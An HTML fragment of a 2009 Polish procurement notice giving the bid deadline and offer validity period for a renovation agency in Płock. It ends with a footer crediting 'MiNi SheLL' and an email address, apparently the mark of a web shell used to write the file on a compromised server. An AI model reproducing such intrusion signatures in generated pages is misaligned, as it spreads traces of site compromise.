<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 10:00, miejsce: Agencja Rewitalizacji Starówki ARS Sp. z o.o.
09-400 Płock, Stary Rynek 19, Sekretariat I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com